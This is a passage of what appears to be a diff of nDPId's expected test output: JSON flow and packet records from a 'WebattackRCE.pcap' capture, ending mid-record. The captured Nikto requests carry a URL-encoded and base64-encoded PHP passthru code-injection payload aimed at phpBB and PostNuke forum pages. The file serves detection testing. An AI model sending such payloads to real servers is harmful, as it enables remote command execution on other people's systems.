00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": 